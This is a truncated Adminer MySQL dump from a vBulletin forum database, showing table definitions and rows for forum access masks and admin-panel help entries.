-- Adminer 4.1.0 MySQL dump SET NAMES utf8; SET time_zone = '+00:00'; SET foreign_key_checks = 0; SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO'; DROP TABLE IF EXISTS `access`; CREATE TABLE `access` ( `userid` int(10) unsigned NOT NULL DEFAULT '0', `forumid` smallint(5) unsigned NOT NULL DEFAULT '0', `accessmask` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`userid`,`forumid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `access` (`userid`, `forumid`, `accessmask`) VALUES (2, 1, 0), (2, 2, 0), (2, 4, 0), (2, 6, 0), (2, 7, 0), (2, 9, 0), (2, 10, 0), (2, 11, 0), (2, 13, 0), (2, 14, 0), (2, 15, 0), (2, 16, 0), (2, 17, 0), (2, 18, 0), (2, 24, 0), (386, 1, 1), (386, 2, 1), (386, 4, 1), (386, 6, 1), (386, 7, 1), (386, 9, 1), (386, 10, 1), (386, 11, 1), (386, 13, 1), (386, 14, 1), (386, 15, 1), (386, 16, 1), (386, 17, 1), (386, 18, 1), (386, 24, 1), (386, 31, 1), (386, 32, 1), (386, 35, 1), (386, 36, 1), (386, 37, 1), (386, 38, 1), (386, 39, 1), (388, 1, 1), (388, 2, 1), (388, 4, 1), (388, 6, 1), (388, 7, 1), (388, 9, 1), (388, 10, 1), (388, 11, 1), (388, 13, 1), (388, 14, 1), (388, 15, 1), (388, 16, 1), (388, 17, 1), (388, 18, 1), (388, 24, 1), (388, 31, 1), (388, 32, 1), (388, 35, 1), (388, 36, 1), (388, 37, 1), (388, 38, 1), (388, 39, 1); DROP TABLE IF EXISTS `adminhelp`; CREATE TABLE `adminhelp` ( `adminhelpid` int(10) unsigned NOT NULL AUTO_INCREMENT, `script` varchar(50) NOT NULL DEFAULT '', `action` varchar(25) NOT NULL DEFAULT '', `optionname` varchar(100) NOT NULL DEFAULT '', `displayorder` smallint(5) unsigned NOT NULL DEFAULT '1', `volatile` smallint(5) unsigned NOT NULL DEFAULT '0', `product` varchar(25) NOT NULL DEFAULT '', PRIMARY KEY (`adminhelpid`), UNIQUE KEY `phraseunique` (`script`,`action`,`optionname`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `adminhelp` (`adminhelpid`, `script`, `action`, `optionname`, `displayorder`, `volatile`, `product`) VALUES (3327, 'accessmask', '', '', 1, 1, 'vbulletin'), (3328, 'accessmask', 'edit', '', 1, 1, 'vbulletin'), (3329, 'accessmask', 'modify', '', 1, 1, 'vbulletin'), (3330, 'accessmask', 'quickedit', '', 1, 1, 'vbulletin'), (3331, 'accessmask', 'resetall', '', 1, 1, 'vbulletin'), (3332, 'admincalendar', '', '', 1, 1, 'vbulletin'), (3333, 'admincalendar', 'add', '', 1, 1, 'vbulletin'), (3334, 'admincalendar', 'add,edit', 'title', 20, 1, 'vbulletin'), (3335, 'admincalendar', 'add,edit', 'displayorder', 40, 1, 'vbulletin'), (3336, 'admincalendar', 'add,edit', 'customfields', 50, 1, 'vbulletin'), (3337, 'admincalendar', 'add,edit', 'neweventemail', 60, 1, 'vbulletin'), (3338, 'admincalendar', 'add,edit', 'moderatenew', 70, 1, 'vbulletin'), (3339, 'admincalendar', 'add,edit', 'daterange', 75, 1, 'vbulletin'), (3340, 'admincalendar', 'add,edit', 'default', 76, 1, 'vbulletin'), (3341, 'admincalendar', 'add,edit', 'startofweek', 80, 1, 'vbulletin'), (3342, 'admincalendar', 'add,edit', 'cutoff', 90, 1, 'vbulletin'), (3343, 'admincalendar', 'add,edit', 'eventcount', 100, 1, 'vbulletin'), (3344, 'admincalendar', 'add,edit', 'birthdaycount', 110, 1, 'vbulletin'), (3345, 'admincalendar', 'add,edit', 'showbirthdays', 120, 1, 'vbulletin'), (3346, 'admincalendar', 'add,edit', 'showholidays', 130, 1, 'vbulletin'), (3347, 'admincalendar', 'add,edit', 'holidays', 135, 1, 'vbulletin'), (3348, 'admincalendar', 'add,edit', 'showweekends', 140, 1, 'vbulletin'), (3349, 'admincalendar', 'add,edit', 'showupcoming', 145, 1, 'vbulletin'), (3350, 'admincalendar', 'add,edit', 'allowhtml', 150, 1, 'vbulletin'), (3351, 'admincalendar', 'add,edit', 'allowbbcode', 160, 1, 'vbulletin'), (3352, 'admincalendar', 'add,edit', 'allowimgcode', 170, 1, 'vbulletin'), (3353, 'admincalendar', 'add,edit', 'allowsmilies', 180, 1, 'vbulletin'), (3354, 'admincalendar', 'addcustom', '', 1, 1, 'vbulletin'), (3355, 'admincalendar', 'addcustom', 'title', 20, 1, 'vbulletin'), (3356, 'admincalendar', 'addcustom', 'description', 25, 1, 'vbulletin'), (3357, 'admincalendar', 'addcustom', 'options', 30, 1, 'vbulletin'), (3358, 'admincalendar', 'addcustom', 'allowentry', 40, 1, 'vbulletin'), (3359, 'admincalendar', 'addcustom', 'length', 50, 1, 'vbulletin'), (3360, 'admincalendar', 'addcustom', 'required', 60, 1, 'vbulletin'), (3361, 'admincalendar', 'addmod', '', 1, 1, 'vbulletin'), (3362, 'admincalendar', 'addmod', 'modusername', 30, 1, 'vbulletin'), (3363, 'admincalendar', 'addmod,editmod', 'calendarid', 20, 1, 'vbulletin'), (3364, 'admincalendar', 'addmod,editmod', 'caneditevents', 40, 1, 'vbulletin'), (3365, 'admincalendar', 'addmod,editmod', 'candeleteevents', 50, 1, 'vbulletin'), (3366, 'admincalendar', 'addmod,editmod', 'canmoveevents', 55, 1, 'vbulletin'), (3367, 'admincalendar', 'addmod,editmod', 'canmoderateevents', 60, 1, 'vbulletin'), (3368, 'admincalendar', 'addmod,editmod', 'canviewips', 70, 1, 'vbulletin'), (3369, 'admincalendar', 'deletecustom', '', 1, 1, 'vbulletin'), (3370, 'admincalendar', 'edit', '', 1, 1, 'vbulletin'), (3371, 'admincalendar', 'editmod', '', 1, 1, 'vbulletin'), (3372, 'admincalendar', 'modify', '', 1, 1, 'vbulletin'), (3373, 'admincalendar', 'modifyholiday', '', 1, 1, 'vbulletin'), (3374, 'admincalendar', 'remove', '', 1, 1, 'vbulletin'), (3375, 'admincalendar', 'removeholiday', '', 1, 1, 'vbulletin'), (3376, 'admincalendar', 'removemod', '', 1, 1, 'vbulletin'), (3377, 'admincalendar', 'updateholiday', '', 1, 1, 'vbulletin'), (3378, 'admincalendar', 'updateholiday', 'description', 1, 1, 'vbulletin'), (3379, 'admincalendar', 'updateholiday', 'varname', 10, 1, 'vbulletin'), (3380, 'admincalendar', 'updateholiday', 'title', 20, 1, 'vbulletin'), (3381, 'admincalendar', 'updateholiday', 'event', 30, 1, 'vbulletin'), (3382, 'admincalendar', 'updateholiday', 'recurring', 40, 1, 'vbulletin'), (3383, 'admincalendar', 'updateholiday', 'allowsmilies', 50, 1, 'vbulletin'), (3384, 'admininfraction', '', '', 1, 1, 'vbulletin'), (3385, 'admininfraction', 'editbangroup', 'amount', 10, 1, 'vbulletin'), (3386, 'admininfraction', 'editbangroup', 'method', 20, 1, 'vbulletin'), (3387, 'admininfraction', 'editbangroup', 'usergroupid', 30, 1, 'vbulletin'), (3388, 'admininfraction', 'editbangroup', 'banusergroupid', 50, 1, 'vbulletin'), (3389, 'admininfraction', 'editbangroup', 'period', 60, 1, 'vbulletin'), (3390, 'admininfraction', 'editgroup', '', 1, 1, 'vbulletin'), (3391, 'admininfraction', 'editgroup', 'override', 1, 1, 'vbulletin'), (3392, 'admininfraction', 'editgroup', 'pointlevel', 2, 1, 'vbulletin'), (3393, 'admininfraction', 'editgroup', 'usergroupid', 10, 1, 'vbulletin'), (3394, 'admininfraction', 'editgroup', 'orusergroupid', 30, 1, 'vbulletin'), (3395, 'admininfraction', 'editlevel', 'title', 1, 1, 'vbulletin'), (3396, 'admininfraction', 'editlevel', 'expires', 5, 1, 'vbulletin'), (3397, 'admininfraction', 'editlevel', 'points', 7, 1, 'vbulletin'), (3398, 'admininfraction', 'editlevel', 'warning', 10, 1, 'vbulletin'), (3399, 'admininfraction', 'editlevel', 'extend', 15, 1, 'vbulletin'), (3400, 'admininfraction', 'modify', '', 1, 1, 'vbulletin'), (3401, 'adminlog', '', '', 1, 1, 'vbulletin'), (3402, 'adminlog', 'choose', '', 1, 1, 'vbulletin'), (3403, 'adminlog', 'choose', 'enddate', 1, 1, 'vbulletin'), (3404, 'adminlog', 'choose', 'startdate', 1, 1, 'vbulletin'), (3405, 'adminlog', 'choose', 'perpage', 20, 1, 'vbulletin'), (3406, 'adminlog', 'choose', 'script', 30, 1, 'vbulletin'), (3407, 'adminlog', 'choose', 'userid', 40, 1, 'vbulletin'), (3408, 'adminlog', 'choose', 'orderby', 50, 1, 'vbulletin'), (3409, 'adminlog', 'choose', 'pscript', 60, 1, 'vbulletin'), (3410, 'adminlog', 'choose', 'puserid', 70, 1, 'vbulletin'), (3411, 'adminlog', 'choose', 'daysprune', 80, 1, 'vbulletin'), (3412, 'adminlog', 'prunelog', '', 1, 1, 'vbulletin'), (3413, 'adminlog', 'resolveip', '', 2, 1, 'vbulletin'), (3414, 'adminlog', 'restrict', '', 1, 1, 'vbulletin'), (3415, 'adminlog', 'view', '', 1, 1, 'vbulletin'), (3416, 'adminpermissions', '', '', 1, 1, 'vbulletin'), (3417, 'adminpermissions', 'edit', '', 1, 1, 'vbulletin'), (3418, 'adminpermissions', 'edit', 'canadminmodlog', 1, 1, 'vbulletin'), (3419, 'adminpermissions', 'edit', 'dismissednews', 1, 1, 'vbulletin'), (3420, 'adminpermissions', 'edit', 'canadminsettings', 20, 1, 'vbulletin'), (3421, 'adminpermissions', 'edit', 'canadminstyles', 30, 1, 'vbulletin'), (3422, 'adminpermissions', 'edit', 'canadminlanguages', 40, 1, 'vbulletin'), (3423, 'adminpermissions', 'edit', 'canadminforums', 50, 1, 'vbulletin'), (3424, 'adminpermissions', 'edit', 'canadminthreads', 60, 1, 'vbulletin'), (3425, 'adminpermissions', 'edit', 'canadmincalendars', 70, 1, 'vbulletin'), (3426, 'adminpermissions', 'edit', 'canadminusers', 80, 1, 'vbulletin'), (3427, 'adminpermissions', 'edit', 'canadminfaq', 90, 1, 'vbulletin'), (3428, 'adminpermissions', 'edit', 'canadminpermissions', 90, 1, 'vbulletin'), (3429, 'adminpermissions', 'edit', 'canadminimages', 100, 1, 'vbulletin'), (3430, 'adminpermissions', 'edit', 'canadminbbcodes', 110, 1, 'vbulletin'), (3431, 'adminpermissions', 'edit', 'canadmincron', 120, 1, 'vbulletin'), (3432, 'adminpermissions', 'edit', 'canadminmaintain', 130, 1, 'vbulletin'), (3433, 'adminpermissions', 'edit', 'canadminplugins', 135, 1, 'vbulletin'), (3434, 'adminpermissions', 'edit', 'canadminnotices', 136, 1, 'vbulletin'), (3435, 'adminpermissions', 'edit', 'cssprefs', 140, 1, 'vbulletin'), (3436, 'adminpermissions', 'modify', '', 1, 1, 'vbulletin'), (3437, 'adminreputation', '', '', 1, 1, 'vbulletin'), (3438, 'adminreputation', 'add', '', 1, 1, 'vbulletin'), (3439, 'adminreputation', 'add,edit', 'level', 10, 1, 'vbulletin'), (3440, 'adminreputation', 'add,edit', 'minimumreputation', 20, 1, 'vbulletin'), (3441, 'adminreputation', 'deletereputation', '', 1, 1, 'vbulletin'), (3442, 'adminreputation', 'dolist', '', 1, 1, 'vbulletin'), (3443, 'adminreputation', 'edit', '', 1, 1, 'vbulletin'), (3444, 'adminreputation', 'editreputation', '', 1, 1, 'vbulletin'), (3445, 'adminreputation', 'editreputation', 'reason', 10, 1, 'vbulletin'), (3446, 'adminreputation', 'editreputation', 'reputation', 20, 1, 'vbulletin'), (3447, 'adminreputation', 'list', '', 1, 1, 'vbulletin'), (3448, 'adminreputation', 'list,dolist', 'leftfor', 10, 1, 'vbulletin'), (3449, 'adminreputation', 'list,dolist', 'leftby', 20, 1, 'vbulletin'), (3450, 'adminreputation', 'list,dolist', 'start', 30, 1, 'vbulletin'), (3451, 'adminreputation', 'list,dolist', 'end', 40, 1, 'vbulletin'), (3452, 'adminreputation', 'modify', '', 1, 1, 'vbulletin'), (3453, 'adminreputation', 'remove', '', 1, 1, 'vbulletin'), (3454, 'album', 'storage', '', 1, 1, 'vbulletin'), (3455, 'album', 'switchtype', 'album_picpath', 1, 1, 'vbulletin'), (3456, 'album', 'switchtype', 'album_thumbpath', 1, 1, 'vbulletin'), (3457, 'album', 'switchtype', 'album_thumburl', 1, 1, 'vbulletin'), (3458, 'album', 'thumb', 'perpage', 1, 1, 'vbulletin'), (3459, 'album', 'thumb', 'quality', 1, 1, 'vbulletin'), (3460, 'announcement', '', '', 1, 1, 'vbulletin'), (3461, 'announcement', 'add', '', 1, 1, 'vbulletin'), (3462, 'announcement', 'add', 'signature', 120, 1, 'vbulletin'), (3463, 'announcement', 'add,edit', 'forumid', 20, 1, 'vbulletin'), (3464, 'announcement', 'add,edit', 'title', 30, 1, 'vbulletin'), (3465, 'announcement', 'add,edit', 'startdate', 40, 1, 'vbulletin'), (3466, 'announcement', 'add,edit', 'enddate', 50, 1, 'vbulletin'), (3467, 'announcement', 'add,edit', 'pagetext', 60, 1, 'vbulletin'), (3468, 'announcement', 'add,edit', 'allowbbcode', 70, 1, 'vbulletin'), (3469, 'announcement', 'add,edit', 'allowsmilies', 80, 1, 'vbulletin'), (3470, 'announcement', 'add,edit', 'allowhtml', 90, 1, 'vbulletin'), (3471, 'announcement', 'add,edit', 'parseurl', 110, 1, 'vbulletin'), (3472, 'announcement', 'edit', '', 1, 1, 'vbulletin'), (3473, 'announcement', 'edit', 'reset_views', 100, 1, 'vbulletin'), (3474, 'announcement', 'modify', '', 1, 1, 'vbulletin'), (3475, 'announcement', 'remove', '', 1, 1, 'vbulletin'), (3476, 'attachment', '', '', 1, 1, 'vbulletin'), (3477, 'attachment', 'delete', '', 1, 1, 'vbulletin'), (3478, 'attachment', 'edit', '', 1, 1, 'vbulletin'), (3479, 'attachment', 'edit', 'upload', 1, 1, 'vbulletin'), (3480, 'attachment', 'edit', 'url', 1, 1, 'vbulletin'), (3481, 'attachment', 'edit', 'a_filename', 20, 1, 'vbulletin'), (3482, 'attachment', 'edit', 'a_counter', 30, 1, 'vbulletin'), (3483, 'attachment', 'edit', 'a_visible', 40, 1, 'vbulletin'), (3484, 'attachment', 'intro', '', 1, 1, 'vbulletin'), (3485, 'attachment', 'intro', 'prunedate', 10, 1, 'vbulletin'), (3486, 'attachment', 'intro', 'filename', 15, 1, 'vbulletin'), (3487, 'attachment', 'intro', 'attachedby', 20, 1, 'vbulletin'), (3488, 'attachment', 'intro', 'datelinebefore', 30, 1, 'vbulletin'), (3489, 'attachment', 'intro', 'datelineafter', 40, 1, 'vbulletin'), (3490, 'attachment', 'intro', 'downloadsmore', 50, 1, 'vbulletin'), (3491, 'attachment', 'intro', 'downloadsless', 60, 1, 'vbulletin'), (3492, 'attachment', 'intro', 'sizemore', 70, 1, 'vbulletin'), (3493, 'attachment', 'intro', 'sizeless', 80, 1, 'vbulletin'), (3494, 'attachment', 'intro', 'visible', 90, 1, 'vbulletin'), (3495, 'attachment', 'intro', 'orderby', 100, 1, 'vbulletin'), (3496, 'attachment', 'intro', 'results', 110, 1, 'vbulletin'), (3497, 'attachment', 'massdelete', '', 1, 1, 'vbulletin'), (3498, 'attachment', 'removetype', '', 1, 1, 'vbulletin'), (3499, 'attachment', 'search', '', 1, 1, 'vbulletin'), (3500, 'attachment', 'stats', '', 1, 1, 'vbulletin'), (3501, 'attachment', 'storage,switchtype', '', 1, 1, 'vbulletin'), (3502, 'attachment', 'switchtype', 'attachpath', 1, 1, 'vbulletin'), (3503, 'attachment', 'types', '', 1, 1, 'vbulletin'), (3504, 'attachment', 'updatetype', '', 1, 1, 'vbulletin'), (3505, 'attachment', 'updatetype', 'extension', 10, 1, 'vbulletin'), (3506, 'attachment', 'updatetype', 'size', 20, 1, 'vbulletin'), (3507, 'attachment', 'updatetype', 'height', 30, 1, 'vbulletin'), (3508, 'attachment', 'updatetype', 'width', 40, 1, 'vbulletin'), (3509, 'attachment', 'updatetype', 'mimetype', 50, 1, 'vbulletin'), (3510, 'attachment', 'updatetype', 'enabled', 60, 1, 'vbulletin'), (3511, 'attachment', 'updatetype', 'newwindow', 70, 1, 'vbulletin'), (3512, 'attachmentpermission', 'edit', 'height', 1, 1, 'vbulletin'), (3513, 'attachmentpermission', 'edit', 'size', 1, 1, 'vbulletin'), (3514, 'attachmentpermission', 'edit', 'useextension', 1, 1, 'vbulletin'), (3515, 'attachmentpermission', 'edit', 'width', 1, 1, 'vbulletin'), (3516, 'avatar', '', '', 1, 1, 'vbulletin'), (3517, 'avatar', 'storage,switchtype', '', 1, 1, 'vbulletin'), (3518, 'avatar', 'switchtype', 'avatarpath', 1, 1, 'vbulletin'), (3519, 'avatar', 'switchtype', 'avatarurl', 1, 1, 'vbulletin'), (3520, 'avatar', 'switchtype', 'profilepicpath', 1, 1, 'vbulletin'), (3521, 'avatar', 'switchtype', 'profilepicurl', 1, 1, 'vbulletin'), (3522, 'avatar', 'switchtype', 'sigpicpath', 1, 1, 'vbulletin'), (3523, 'avatar', 'switchtype', 'sigpicurl', 1, 1, 'vbulletin'), (3524, 'backup', '', '', 1, 1, 'vbulletin'), (3525, 'backup', 'choose', '', 1, 1, 'vbulletin'), (3526, 'backup', 'choose', 'filename', 10, 1, 'vbulletin'), (3527, 'backup', 'choose', 'table', 20, 1, 'vbulletin'), (3528, 'backup', 'choose', 'separator', 30, 1, 'vbulletin'), (3529, 'backup', 'choose', 'quotes', 40, 1, 'vbulletin'), (3530, 'backup', 'choose', 'showhead', 50, 1, 'vbulletin'), (3531, 'backup', 'mysqldump', '', 1, 1, 'vbulletin'), (3532, 'banning', '', '', 1, 1, 'vbulletin'), (3533, 'banning', 'banuser', '', 1, 1, 'vbulletin'), (3534, 'banning', 'banuser', 'username', 10, 1, 'vbulletin'), (3535, 'banning', 'banuser', 'usergroupid', 20, 1, 'vbulletin'), (3536, 'banning', 'banuser', 'period', 30, 1, 'vbulletin'), (3537, 'banning', 'banuser,editreason', 'reason', 40, 1, 'vbulletin'), (3538, 'banning', 'modify', '', 1, 1, 'vbulletin'), (3539, 'bbcode', '', '', 1, 1, 'vbulletin'), (3540, 'bbcode', 'add', '', 1, 1, 'vbulletin'), (3541, 'bbcode', 'add,edit', 'title', 10, 1, 'vbulletin'), (3542, 'bbcode', 'add,edit', 'bbcodetag', 20, 1, 'vbulletin'), (3543, 'bbcode', 'add,edit', 'bbcodereplacement', 30, 1, 'vbulletin'), (3544, 'bbcode', 'add,edit', 'bbcodeexample', 50, 1, 'vbulletin'), (3545, 'bbcode', 'add,edit', 'bbcodeexplanation', 60, 1, 'vbulletin'), (3546, 'bbcode', 'add,edit', 'twoparams', 70, 1, 'vbulletin'), (3547, 'bbcode', 'add,edit', 'buttonimage', 80, 1, 'vbulletin'), (3548, 'bbcode', 'add,edit', 'strip_empty', 90, 1, 'vbulletin'), (3549, 'bbcode', 'add,edit', 'stop_parse', 100, 1, 'vbulletin'), (3550, 'bbcode', 'add,edit', 'disable_smilies', 110, 1, 'vbulletin'), (3551, 'bbcode', 'add,edit', 'disable_wordwrap', 120, 1, 'vbulletin'), (3552, 'bbcode', 'edit', '', 1, 1, 'vbulletin'), (3553, 'bbcode', 'modify', '', 1, 1, 'vbulletin'), (3554, 'bbcode', 'modify', 'text', 20, 1, 'vbulletin'), (3555, 'bbcode', 'remove', '', 1, 1, 'vbulletin'), (3556, 'bookmarksite', 'add,edit', 'active', 1, 1, 'vbulletin'), (3557, 'bookmarksite', 'add,edit', 'displayorder', 1, 1, 'vbulletin'), (3558, 'bookmarksite', 'add,edit', 'iconpath', 1, 1, 'vbulletin'), (3559, 'bookmarksite', 'add,edit', 'title', 1, 1, 'vbulletin'), (3560, 'bookmarksite', 'add,edit', 'url', 1, 1, 'vbulletin'), (3561, 'bookmarksite', 'modify', '', 1, 1, 'vbulletin'), (3562, 'calendarpermission', '', '', 1, 1, 'vbulletin'), (3563, 'calendarpermission', 'edit', '', 1, 1, 'vbulletin'), (3564, 'calendarpermission', 'edit', 'mode', 20, 1, 'vbulletin'), (3565, 'calendarpermission', 'edit', 'canviewcalendar', 30, 1, 'vbulletin'), (3566, 'calendarpermission', 'edit', 'canpostevent', 40, 1, 'vbulletin'), (3567, 'calendarpermission', 'edit', 'caneditevent', 50, 1, 'vbulletin'), (3568, 'calendarpermission', 'edit', 'candeleteevent', 60, 1, 'vbulletin'), (3569, 'calendarpermission', 'edit', 'canviewothersevent', 70, 1, 'vbulletin'), (3570, 'calendarpermission', 'edit', 'isnotmoderated', 80, 1, 'vbulletin'), (3571, 'calendarpermission', 'modify', '', 1, 1, 'vbulletin'), (3572, 'cronadmin', '', '', 1, 1, 'vbulletin'), (3573, 'cronadmin', 'add', '', 1, 1, 'vbulletin'), (3574, 'cronadmin', 'add,edit', 'active', 1, 1, 'vbulletin'), (3575, 'cronadmin', 'add,edit', 'description', 1, 1, 'vbulletin'), (3576, 'cronadmin', 'add,edit', 'varname', 2, 1, 'vbulletin'), (3577, 'cronadmin', 'add,edit', 'logphrase', 3, 1, 'vbulletin'), (3578, 'cronadmin', 'add,edit', 'title', 10, 1, 'vbulletin'), (3579, 'cronadmin', 'add,edit', 'weekday', 20, 1, 'vbulletin'), (3580, 'cronadmin', 'add,edit', 'day', 30, 1, 'vbulletin'), (3581, 'cronadmin', 'add,edit', 'hour', 40, 1, 'vbulletin'), (3582, 'cronadmin', 'add,edit', 'minute', 50, 1, 'vbulletin'), (3583, 'cronadmin', 'add,edit', 'loglevel', 60, 1, 'vbulletin'), (3584, 'cronadmin', 'add,edit', 'filename', 70, 1, 'vbulletin'), (3585, 'cronadmin', 'edit', '', 1, 1, 'vbulletin'), (3586, 'cronadmin', 'edit', 'product', 1, 1, 'vbulletin'), (3587, 'cronadmin', 'modify', '', 1, 1, 'vbulletin'), (3588, 'cronadmin', 'remove', '', 1, 1, 'vbulletin'), (3589, 'cronlog', '', '', 1, 1, 'vbulletin'), (3590, 'cronlog', 'choose', '', 1, 1, 'vbulletin'), (3591, 'cronlog', 'choose', 'perpage', 20, 1, 'vbulletin'), (3592, 'cronlog', 'choose', 'varname', 30, 1, 'vbulletin'), (3593, 'cronlog', 'choose', 'orderby', 40, 1, 'vbulletin'), (3594, 'cronlog', 'choose', 'daysprune', 60, 1, 'vbulletin'), (3595, 'cronlog', 'prunelog', '', 1, 1, 'vbulletin'), (3596, 'cronlog', 'view', '', 1, 1, 'vbulletin'), (3597, 'css', '', '', 1, 1, 'vbulletin'), (3598, 'css', 'doedit', '', 1, 1, 'vbulletin'), (3599, 'css', 'doedit', 'header', 10, 1, 'vbulletin'), (3600, 'css', 'doedit', 'headinclude', 20, 1, 'vbulletin'), (3601, 'css', 'doedit', 'footer', 30, 1, 'vbulletin'), (3602, 'css', 'doedit', 'outertablewidth', 60, 1, 'vbulletin'), (3603, 'css', 'doedit', 'spacersize', 70, 1, 'vbulletin'), (3604, 'css', 'doedit', 'outerborderwidth', 80, 1, 'vbulletin'), (3605, 'css', 'doedit', 'cellspacing', 90, 1, 'vbulletin'), (3606, 'css', 'doedit', 'cellpadding', 100, 1, 'vbulletin'), (3607, 'css', 'doedit', 'formspacer', 110, 1, 'vbulletin'), (3608, 'css', 'doedit', 'formwidth', 120, 1, 'vbulletin'), (3609, 'css', 'doedit', 'formwidth_usercp', 130, 1, 'vbulletin'), (3610, 'css', 'doedit', 'messagewidth', 140, 1, 'vbulletin'), (3611, 'css', 'doedit', 'messagewidth_usercp', 150, 1, 'vbulletin'), (3612, 'css', 'doedit', 'codeblockwidth', 160, 1, 'vbulletin'), (3613, 'css', 'doedit', 'titleimage', 170, 1, 'vbulletin'), (3614, 'css', 'doedit', 'imgdir_button', 180, 1, 'vbulletin'), (3615, 'css', 'doedit', 'imgdir_statusicon', 190, 1, 'vbulletin'), (3616, 'css', 'doedit', 'imgdir_attach', 200, 1, 'vbulletin'), (3617, 'css', 'doedit', 'imgdir_misc', 210, 1, 'vbulletin'), (3618, 'css', 'doedit', 'imgdir_editor', 220, 1, 'vbulletin'), (3619, 'css', 'doedit', 'imgdir_poll', 230, 1, 'vbulletin'), (3620, 'css', 'doedit', 'imgdir_rating', 240, 1, 'vbulletin'), (3621, 'css', 'doedit', 'htmldoctype', 250, 1, 'vbulletin'), (3622, 'css', 'doedit', 'imgdir_reputation', 250, 1, 'vbulletin'), (3623, 'deployads', 'intro', '', 1, 1, 'vbulletin'), (3624, 'diagnostic', '', '', 1, 1, 'vbulletin'), (3625, 'diagnostic', 'domail', '', 1, 1, 'vbulletin'), (3626, 'diagnostic', 'dosysinfo', '', 1, 1, 'vbulletin'), (3627, 'diagnostic', 'doupload', '', 1, 1, 'vbulletin'), (3628, 'diagnostic', 'doversion', '', 1, 1, 'vbulletin'), (3629, 'diagnostic', 'list', '', 1, 1, 'vbulletin'), (3630, 'diagnostic', 'list', 'attachfile', 20, 1, 'vbulletin'), (3631, 'diagnostic', 'list', 'emailaddress', 20, 1, 'vbulletin'), (3632, 'diagnostic', 'list', 'type', 20, 1, 'vbulletin'), (3633, 'diagnostic', 'payments', '', 1, 1, 'vbulletin'), (3634, 'email', '', '', 1, 1, 'vbulletin'), (3635, 'email', 'genlist', '', 1, 1, 'vbulletin'), (3636, 'email', 'genlist', 'septext', 20, 1, 'vbulletin'), (3637, 'email', 'genlist,start', 'username', 70, 1, 'vbulletin'), (3638, 'email', 'genlist,start', 'usergroupid', 90, 1, 'vbulletin'), (3639, 'email', 'genlist,start', 'membergroup', 100, 1, 'vbulletin'), (3640, 'email', 'genlist,start', 'adminemail', 105, 1, 'vbulletin'), (3641, 'email', 'genlist,start', 'email', 110, 1, 'vbulletin'), (3642, 'email', 'genlist,start', 'parentemail', 120, 1, 'vbulletin'), (3643, 'email', 'genlist,start', 'coppauser', 130, 1, 'vbulletin'), (3644, 'email', 'genlist,start', 'homepage', 140, 1, 'vbulletin'), (3645, 'email', 'genlist,start', 'icq', 150, 1, 'vbulletin'), (3646, 'email', 'genlist,start', 'aim', 160, 1, 'vbulletin'), (3647, 'email', 'genlist,start', 'yahoo', 170, 1, 'vbulletin'), (3648, 'email', 'genlist,start', 'msn', 175, 1, 'vbulletin'), (3649, 'email', 'genlist,start', 'skype', 177, 1, 'vbulletin'), (3650, 'email', 'genlist,start', 'signature', 180, 1, 'vbulletin'), (3651, 'email', 'genlist,start', 'usertitle', 190, 1, 'vbulletin'), (3652, 'email', 'genlist,start', 'joindateafter', 200, 1, 'vbulletin'), (3653, 'email', 'genlist,start', 'joindatebefore', 210, 1, 'vbulletin'), (3654, 'email', 'genlist,start', 'lastactivityafter', 213, 1, 'vbulletin'), (3655, 'email', 'genlist,start', 'lastactivitybefore', 217, 1, 'vbulletin'), (3656, 'email', 'genlist,start', 'lastpostafter', 240, 1, 'vbulletin'), (3657, 'email', 'genlist,start', 'lastpostbefore', 250, 1, 'vbulletin'), (3658, 'email', 'genlist,start', 'birthdayafter', 260, 1, 'vbulletin'), (3659, 'email', 'genlist,start', 'birthdaybefore', 270, 1, 'vbulletin'), (3660, 'email', 'genlist,start', 'postslower', 280, 1, 'vbulletin'), (3661, 'email', 'genlist,start', 'postsupper', 290, 1, 'vbulletin'), (3662, 'email', 'genlist,start', 'reputationlower', 300, 1, 'vbulletin'), (3663, 'email', 'genlist,start', 'reputationupper', 310, 1, 'vbulletin'), (3664, 'email', 'genlist,start', 'warningslower', 330, 1, 'vbulletin'), (3665, 'email', 'genlist,start', 'warningsupper', 340, 1, 'vbulletin'), (3666, 'email', 'genlist,start', 'infractionslower', 350, 1, 'vbulletin'), (3667, 'email', 'genlist,start', 'infractionsupper', 360, 1, 'vbulletin'), (3668, 'email', 'genlist,start', 'pointslower', 370, 1, 'vbulletin'), (3669, 'email', 'genlist,start', 'pointsupper', 380, 1, 'vbulletin'), (3670, 'email', 'genlist,start', 'useridlower', 390, 1, 'vbulletin'), (3671, 'email', 'genlist,start', 'useridupper', 395, 1, 'vbulletin'), (3672, 'email', 'genlist,start', 'ipaddress', 400, 1, 'vbulletin'), (3673, 'email', 'start', '', 1, 1, 'vbulletin'), (3674, 'email', 'start', 'test', 20, 1, 'vbulletin'), (3675, 'email', 'start', 'perpage', 30, 1, 'vbulletin'), (3676, 'email', 'start', 'from', 40, 1, 'vbulletin'), (3677, 'email', 'start', 'subject', 50, 1, 'vbulletin'), (3678, 'email', 'start', 'message', 60, 1, 'vbulletin'), (3679, 'faq', '', '', 1, 1, 'vbulletin'), (3680, 'faq', 'add', '', 1, 1, 'vbulletin'), (3681, 'faq', 'add', 'product', 1, 1, 'vbulletin'), (3682, 'faq', 'add', 'faq', 5, 1, 'vbulletin'), (3683, 'faq', 'add,edit', 'faqparent', 10, 1, 'vbulletin'), (3684, 'faq', 'add,edit', 'deftitle', 20, 1, 'vbulletin'), (3685, 'faq', 'add,edit', 'deftext', 30, 1, 'vbulletin'), (3686, 'faq', 'add,edit', 'displayorder', 40, 1, 'vbulletin'), (3687, 'faq', 'add,edit', '1', 60, 1, 'vbulletin'), (3688, 'faq', 'delete', '', 1, 1, 'vbulletin'), (3689, 'faq', 'edit', '', 1, 1, 'vbulletin'), (3690, 'faq', 'modify', '', 1, 1, 'vbulletin'), (3691, 'forum', '', '', 1, 1, 'vbulletin'), (3692, 'forum', 'add', '', 1, 1, 'vbulletin'), (3693, 'forum', 'add,edit', 'title', 20, 1, 'vbulletin'), (3694, 'forum', 'add,edit', 'description', 30, 1, 'vbulletin'), (3695, 'forum', 'add,edit', 'link', 40, 1, 'vbulletin'), (3696, 'forum', 'add,edit', 'displayorder', 50, 1, 'vbulletin'), (3697, 'forum', 'add,edit', 'parentid', 60, 1, 'vbulletin'), (3698, 'forum', 'add,edit', 'daysprune', 